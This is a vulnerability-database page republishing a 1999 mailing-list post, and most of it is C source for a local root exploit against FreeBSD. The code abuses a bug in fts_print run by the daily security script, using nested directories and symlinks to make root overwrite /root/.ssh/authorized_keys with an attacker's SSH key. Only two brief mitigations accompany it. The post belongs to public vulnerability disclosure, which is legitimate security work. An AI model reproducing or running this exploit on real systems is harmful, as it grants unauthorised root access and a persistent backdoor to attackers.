Lucene search

K

freebsd_root_exploit.txt

🗓️ 22 Sep 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Local FreeBSD root exploit found in fts_print function allowing unauthorized file overwrite.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Subject: FreeBSD (and other BSDs?) local root explot  
To: [email protected]   
  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
/*  
  
  
(c) 1999 babcia padlina ltd. <[email protected]>  
  
  
bug in fts_print function allows to overwrite any file in system, when  
running /etc/security script (executed from 'daily' scripts).  
  
  
affected systems:  
- freebsd (all versions)  
- probably openbsd/netbsd  
  
  
fix:  
- limit root's coredump size  
- patch libc  
  
  
*/  
  
  
#include <stdio.h>  
#include <errno.h>  
#include <sys/stat.h>  
#include <strings.h>  
#include <unistd.h>  
  
  
#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"  
#define FILE "/root/.ssh/authorized_keys"  
#define CORE "find.core"  
#define DEPTH 300  
#define BUFSIZE 250  
  
  
int makedir(dir, linkfrom, linkto)  
char *dir, *linkfrom, *linkto;  
{  
  
  
if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))  
return -1;  
  
  
if (chdir(dir))  
return -1;  
  
  
if (symlink(linkfrom, linkto) < 0)  
return -1;  
  
  
return 0;  
}  
  
  
  
int main(argc, argv)  
int argc;  
char **argv;  
{  
int i = 0;  
char pid[10], buf[BUFSIZE];  
  
  
sprintf(pid, "%d", getpid());  
  
  
if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))  
{  
perror("mkdir()");  
return -1;  
}  
  
  
if (chdir(pid))  
{  
perror("chdir()");  
return -1;  
}  
  
  
bzero(buf, BUFSIZE);  
memset(buf, 0x41, BUFSIZE-1);  
  
  
for(i=0;i<DEPTH;i++)  
{  
if (makedir(STRING, FILE, CORE) < 0)  
{  
perror("makedir()");  
return -1;  
}  
  
  
if(makedir(buf, FILE, CORE) < 0)  
{  
perror("makedir()");  
return -1;  
}  
}  
  
  
return 0;  
}  
  
  
- ---  
* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *  
* Inet: [email protected] ** PGP: D48684904685DF43 EA93AFA13BE170BF *  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGPfreeware 5.0i for non-commercial use  
Charset: noconv  
  
  
iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx  
JkgnTo+Dk3QUFGT2bZdmxx9S  
=Tyvh  
-----END PGP SIGNATURE-----  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo